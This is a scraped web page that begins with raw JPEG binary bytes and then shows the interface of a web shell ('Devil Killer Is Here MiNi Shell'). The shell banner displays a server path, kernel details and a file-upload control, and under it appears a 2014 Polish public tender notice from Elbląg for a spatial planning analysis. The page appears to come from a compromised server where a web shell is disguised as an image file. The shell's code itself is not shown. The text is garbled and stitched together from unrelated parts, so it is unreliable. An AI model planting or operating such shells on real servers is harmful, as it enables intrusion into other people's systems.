JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141006/329812-N-2014.html

<p class="kh_header"><b>Elbląg: Opracowanie analizy uwarunkowań przestrzennych Elbląskiego Obszaru Funkcjonalnego
w ramach projektu Przygotowanie dokumentów strategicznych dla Elbląskiego Obszaru Funkcjonalnego</b><br>
<b>Numer ogłoszenia: 329812 - 2014; data zamieszczenia: 06.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina - Miasto Elbląg , ul. Łączności 1, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 55 235 35 36, 55 239 31 25, faks 55 239 33 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umelblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie analizy uwarunkowań przestrzennych Elbląskiego Obszaru Funkcjonalnego
w ramach projektu Przygotowanie dokumentów strategicznych dla Elbląskiego Obszaru Funkcjonalnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia:Opracowanie analizy uwarunkowań przestrzennych Elbląskiego Obszaru Funkcjonalnego w ramach projektu Przygotowanie dokumentów strategicznych dla Elbląskiego Obszaru Funkcjonalnego Przedmiot główny:CPV: 71.41.00.00-5 Nazewnictwo wg CPV:Usługi planowania przestrzennego Przedmioty dodatkowe:CPV:73.22.00.00-0 Nazewnictwo wg CPV:Usługi doradcze w zakresie rozwoju CPV:79.82.40.00-6 Nazewnictwo wg CPV: Usługi drukowania i dystrybucji
CPV:79.32.00.00-3 Nazewnictwo wg CPV:Usługi badania opinii publicznej
Przedmiotem zamówienia jest opracowanie analizy uwarunkowań przestrzennych Elbląskiego Obszaru Funkcjonalnego w ramach projektu Przygotowanie dokumentów strategicznych dla Elbląskiego Obszaru Funkcjonalnego oraz organizację konsultacji społecznych dla opracowanego dokumentu. Zamówienie jest realizowane w ramach projektu Przygotowanie dokumentów strategicznych dla Elbląskiego Obszaru Funkcjonalnego z Programu Operacyjnego Pomoc Techniczna na lata 2007-2013 w ramach Konkursu Dotacji na działania wspierające jednostki samorządu terytorialnego w zakresie planowania współpracy w ramach miejskich obszarów funkcjonalnych. 
Cel opracowania dokumentu: 1)rozpoznanie struktury funkcjonalno-przestrzennej Elbląskiego Obszaru Funkcjonalnego, zjawisk gospodarczo-ekonomicznych demograficznych i społecznych, 2)przedstawienie problemów, z którymi boryka się region i zagrożeń rozwojowych obszaru,3)	określenie potencjałów gospodarczych, środowiskowych, edukacyjnych, turystycznych i kulturowych oraz zasobów ludzkich regionu oraz możliwość ich wykorzystania dla Elbląskiego Obszaru Funkcjonalnego, 
4)analizę polityk funkcjonalno-przestrzennych poszczególnych gmin tworzących EOF, która określi spójną wizję zagospodarowania przestrzennego obszaru funkcjonalnego.
2. Zakres zamówienia.Zakres zamówienia obejmuje:1)	Opracowanie analizy uwarunkowań funkcjonalno-przestrzennych Elbląskiego Obszaru Funkcjonalnego, która musi zawierać minimum następujące elementy (w formie opisowej i graficznej na mapach dla poszczególnych elementów całego Elbląskiego Obszaru Funkcjonalnego): 
A. uwarunkowania funkcjonalno-przestrzenne Elbląskiego Obszaru Funkcjonalnego, w tym:a)podział terytorialny, b)powiązania administracyjne, infrastrukturalne, przyrodnicze, gospodarczo-ekonomiczne, kulturalne i inne,c) stan funkcjonalności środowiska, w tym rolniczej i leśnej przestrzeni produkcyjnej, wielkość zasobów wodnych oraz wymogi ochrony środowiska, przyrody i krajobrazu kulturowego,
d) zasoby dziedzictwa kulturowego i zabytków oraz dóbr kultury współczesnej i możliwość ich wykorzystania,e) demografia-stan, kierunki zmian, skala zjawisk, 
f) warunki życia mieszkańców, w tym:-w sferze ochrony zdrowia i bezpieczeństwa,
-dostępności i warunków mieszkaniowych,-rozmieszczenia i dostępności infrastruktury społecznej-oświaty, kultury, sportu i rekreacji,-dochodów mieszkańców i miejsc pracy oraz ich rozlokowanie przestrzenne,-dostępności terenów wypoczynku i rekreacji,
-dostępność do zbiorczej komunikacji publicznej,-analiza terenów niezabudowanych przeznaczonych w studium i MPZP poszczególnych gmin pod budownictwo mieszkaniowe w kontekście uwarunkowań demograficznych,-wyznaczenie obszarów szczególnego zagrożenia powodzią.g)występowanie obiektów i terenów chronionych na podstawie odrębnych przepisów,h)stan powiązań funkcjonalnych w oparciu o sieć występującej infrastruktury drogowej (lądowej, wodnej i kolejowej),i)stan powiązań funkcjonalnych i stopień zaopatrzenia w sieci infrastrukturalne, w tym gospodarka wodno-ściekowa, energetyczna (w tym odnawialnej energii) oraz gospodarka odpadami,j)obszary rozmieszczenia Inwestycji celu publicznego o znaczeniu ponadlokalnym.B.kierunki rozwoju przestrzennego Elbląskiego Obszaru Funkcjonalnego w głównych dziedzinach zagospodarowania przestrzennego, w tym: a)rozwoju funkcjonalno-przestrzennego Elbląskiego Obszaru Funkcjonalnego w głównych dziedzinach zagospodarowania przestrzennego,b)obszarów oraz zasad ochrony dziedzictwa kulturowego i zabytków oraz dóbr kultury współczesnej,c)bszarów oraz zasad ochrony środowiska i jego zasobów, ochrony przyrody, krajobrazu kulturowego i uzdrowisk,d)obszarów szczególnego zagrożenia powodzią,e)	kierunków rozwoju systemów komunikacji i infrastruktury technicznej,f)obszarów, na których rozmieszczone będą inwestycje celu publicznego o znaczeniu lokalnym i ponadlokalnym,g)kierunków i zasad kształtowania rolniczej i leśnej przestrzeni produkcyjnej,h)obszarów wymagających przekształceń, rehabilitacji lub rekultywacji,
i) granic terenów zamkniętych i ich stref ochronnych.2)Przygotowanie i prezentacja multimedialna założeń opracowywanego dokumentu-2 spotkania w miejscach wyznaczonych przez Zamawiającego, w udostępnionych przez niego nieodpłatnie pomieszczeniach, w terminach wskazanych przez Zamawiającego.	W spotkaniach udział wezmą przedstawiciele Zamawiającego oraz przedstawiciele gmin tworzących Partnerstwo-członkowie tzw. Komitetu Sterującego.3)	Wystąpienie do: Miejskiej Komisji Urbanistyczno-Architektonicznej w Elblągu oraz zewnętrznych instytucji planowania przestrzennego: Głównej Komisji Urbanistyczno-Architektonicznej, Ministerstwa Transportu, Budownictwa i Gospodarki Morskiej; Warmińsko-Mazurskiego Biura Planowania Przestrzennego w Olsztynie, Dep. Polityki Przestrzennej MRR, Instytutu Geografii i Przestrzennego Zagospodarowania PAN.Zamawiający wymaga dokonania zestawienia opinii wydanych przez wyżej wymienione organy oraz informacji o sposobie ich rozpatrzenia. Wykonawca pokrywa koszty wykonania tego zadania.4) Organizacja konsultacji społecznych dla opracowanego dokumentu:a.	przesłanie projektów dokumentu do przedsiębiorstw, organizacji pozarządowych, klastrów, instytucji branżowych z Elbląskiego Obszaru Funkcjonalnego, b.	moderowanie 2 otwartych spotkań z mieszkańcami Elbląskiego Obszaru Funkcjonalnego w zapewnionym przez Zamawiającego pomieszczeniu, w terminach uzgodnionych z Zamawiającym.3.Wymagania Zamawiającego.1)Wymogi wobec opracowania:a.Punktem wyjścia do zleconego opracowania jest Strategia rozwoju Elbląskiego Obszaru Funkcjonalnego stanowiąca ZAŁĄCZNIK NR 8 do SIWZ. b.	Opracowane dokumenty muszą być wykonane zgodnie z zasadami współcześnie obowiązujących metodologii i z uwzględnieniem założeń wynikających ze wspólnotowych, krajowych i regionalnych dokumentów strategicznych w tym:
-Koncepcją Przestrzennego Zagospodarowania Kraju 2030,-Strategią Rozwoju Kraju 2020,-Krajową Strategią Rozwoju Regionalnego 2010-2020: Regiony, Miasta, Obszary wiejskie,-Strategią Rozwoju Społeczno-Gospodarczego Województwa Warmińsko-Mazurskiego do roku 2025,-projektem Strategii Rozwoju Elbląga 2020+ dostępnym pod linkiem: http://www.elblag.eu/images/stories/9_strategia/pdf/Strategia.pdf 
-dokumentami strategicznymi gmin-partnerów projektu oraz dokumentami planowania przestrzennego gmin-partnerów projektu.c.Opracowane dokumenty muszą być zgodne z wytycznymi Konkursu dotacji na działania wspierające jednostki samorządu terytorialnego oraz Założeniami Umowy Partnerstwa z dnia 10.01.2014 r. zawartej pomiędzy Liderem a Partnerami projektu Przygotowanie dokumentów strategicznych dla Elbląskiego Obszaru Funkcjonalnego stanowiącej ZAŁĄCZNIK NR 7 do SIWZ. d.	Zamawiający wymaga, aby Wykonawca przeprowadził przedmiotowe zamówienie we współpracy z Zamawiającym i Partnerami Projektu, tj. 17 jednostkami samorządu terytorialnego, które w dn. 10.01.2014 r. podpisały Umowę Partnerstwa ws. Realizacji projektu Przygotowanie dokumentów strategicznych dla Elbląskiego Obszaru Funkcjonalnego. Elbląski Obszar Funkcjonalny tworzą następujące jednostki samorządu terytorialnego:-Miasto Elbląg,-Gmina Elbląg,-Powiat Elbląski,-Gmina Gronowo Elbląskie,-Gmina Milejewo,-Gmina Markusy,-Gmina Młynary,-Gmina Pasłęk,
-Gmina Rychliki,-Gmina Pieniężno,-Gmina Tolkmicko,-Miasto i Gmina Frombork,
-Gmina Miasto Braniewo,-Gmina Braniewo,-Powiat Braniewski,-Gmina Godkowo,
-Gmina Wilczęta,-Gmina Płoskinia.2)	Zamawiający wymaga, aby Wykonawca realizował zamówienie w zgodzie z zasadami horyzontalnymi polityk Unii Europejskiej, w szczególności z zasadą równości szans kobiet i mężczyzn. Dobór zespołu realizującego wszystkie składowe zamówienia oraz sposób przeprowadzenia zamówienia będzie uwzględniał zasadę równych szans i przeciwdziałaniu wszelkiej dyskryminacji ze względu na płeć, rasę, pochodzenie etniczne, religię, wiarę, niepełnosprawność, wiek lub orientację seksualną.3)Wykonawca  do diagnoz wykorzysta dane zarówno publikowane, jak i niepublikowane ze źródeł rozproszonych, nie starszych niż z lat 2011/2012. Zamawiający dopuszcza możliwość wykorzystania starszych danych, w przypadku kiedy niemożliwe będzie zebranie danych bardziej aktualnych. Wykonawca każdorazowo poinformuje o tym fakcie Zamawiającego oraz wskaże źródła, na których opierał się Wykonawca.4)Zamawiający wymaga, aby Wykonawca przeniósł na Zamawiającego majątkowe prawa autorskie do wszystkich elementów prac i dokumentów w zakresie rozporządzania nimi i korzystania z nich przez czas nieokreślony na wszystkich polach eksploatacji.5)Zamawiający wymaga, aby Wykonawca wykonał i dostarczył przedmiot zamówienia do siedziby Zamawiającego z zachowaniem poniższych wymogów:a.Dokumenty należy opracować w języku polskim,b.Zamawiający wymaga, aby Wykonawca wypełniał obowiązujące zasady promocji. Wszystkie produkty wymagają oznakowania zgodnie z zapisami Rozporządzenia Rady (WE) nr 1083/2006, Rozporządzenia Komisji (WE) nr 1828/2006, zasadami zawartymi w Strategii komunikacji Funduszy Europejskich na lata 2007-2013 oraz zapisami Księgi identyfikacji wizualnej NSS,c. Wersja robocza dokumentów zostanie dostarczona Zamawiającemu w czterech egzemplarzach w wersji papierowej oraz na elektronicznym nośniku informacji (4 egz.), w plikach w formacie .pdf oraz plikach źródłowych możliwych do edycji (.doc, .docx, XLS, XLX).d. Wersja ostateczna dokumentów zostanie dostarczona Zamawiającemu w 20 egzemplarzach drukowanych (oprawa miękka, klejona, pełnobarwna okładka) oraz na elektronicznym nośniku informacji (20 egz.), w plikach w formacie .pdf oraz plikach możliwych do edycji np.: .doc, .docx oraz wszystkich innych plików źródłowych (wyłącznie na nośnikach elektronicznych), np. XLS, XLX. 4.Zamawiający wymaga, aby w ciągu 7 dni od podpisania umowy Wykonawca przedstawił Zamawiającemu szczegółowy harmonogram realizacji zamówienia. 5.Opracowane dokumenty muszą być skoncentrowane na zagadnieniach ponadlokalnych-o znaczeniu istotnym z punktu widzenia Elbląskiego Obszaru Funkcjonalnego. 6.Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia na usługi.7. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie zamierza powierzyć podwykonawcy. Zamawiający żąda podania przez Wykonawcę w ofercie nazw (firm) podwykonawców, na których zasoby Wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5, 73.22.00.00-0, 79.82.40.00-6, 79.32.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykonanie w sposób należyty w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jednej analizy uwarunkowań funkcjonalno-przestrzennych obszaru (tj. obszaru tworzonego przez co najmniej 4 gminy, w tym gminę miejską lub miasto na prawach powiatu) lub koncepcji przestrzennego zagospodarowania kraju lub planu zagospodarowania przestrzennego województwa lub studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy.
potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VI. ppkt 1.2. SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest dysponowanie:
a) Kierownikiem projektu, którego rolą jest nadzór nad pracą całego zespołu i uzgadnianie kluczowych elementów projektu. Kierownik projektu: 
- w ciągu ostatnich 5 lat przed upływem terminu składania ofert kierował realizacją co najmniej dwóch zakończonych usług polegających na opracowaniu studium uwarunkowań przestrzennych miasta, gminy lub obszaru funkcjonalnego,
- spełnia jeden z warunków Art. 5 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. 2012.647 j.t. z późn. zm.). 
b) Ekspertem ekonomistą - analitykiem rynku, który musi spełniać następujące warunki łącznie:
- wykształcenie wyższe z dziedziny ekonomii (tytuł zawodowy nie niższy niż magister),
- w ciągu ostatnich 5 lat przed upływem terminu składania ofert przeprowadził co najmniej dwie analizy ekonomiczne zasadności realizacji inwestycji liniowych lub wielkoobszarowych.  
potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VI. ppkt 1.3. i 1.4. SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Obowiązek wykazania przez Wykonawcę w wykazie dotyczy usług polegających na wykonaniu analizy uwarunkowań funkcjonalno-przestrzennych obszaru (tj. obszaru tworzonego przez co najmniej 4 gminy, w tym gminę miejską lub miasto na prawach powiatu) lub koncepcji przestrzennego zagospodarowania kraju lub planu zagospodarowania przestrzennego województwa lub studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy.
Dowody, że usługi zostały wykonane należycie, należy złożyć tylko do wskazanych w wykazie usług, o których mowa w sekcji III.3.2) ogłoszenia.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie w zakresie art. 25 ust. 1 pkt 2 ustawy Prawo zamówień publicznych.
Uwaga:
a)Treść wymaganego Oświadczenia w zakresie art. 25 ust. 1 pkt 2 ustawy Prawo zamówień publicznych Zamawiający przekazuje na ZAŁĄCZNIKU NR 2a do SIWZ. Oświadczenie należy składać w oryginale.
b)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane oświadczenie może być złożone przez pełnomocnika w imieniu wszystkich Wykonawców lub przez wszystkich Wykonawców na jednym dokumencie lub przez każdego Wykonawcę odrębnie.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty stanowiące dowód, że Wykonawca będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności pisemne zobowiązanie podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - w przypadku Wykonawcy polegającego na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwości dokonania zmian postanowień zawartej umowy w stosunku do treści oferty w przypadku wystąpienia poniższych okoliczności:
1) konieczności zmiany terminu realizacji poszczególnych elementów Projektu określonych w § 2 ust.1 wzoru umowy, z powodu:
a)działania siły wyższej, tj. wyjątkowego zdarzenia lub okoliczności;
b)zmiany terminów umowy realizacji zadania stanowiącego przedmiot zamówienia dofinansowanie ze środków Unii Europejskiej w ramach Programu Operacyjnego Pomoc Techniczna na lata 2007-2013;
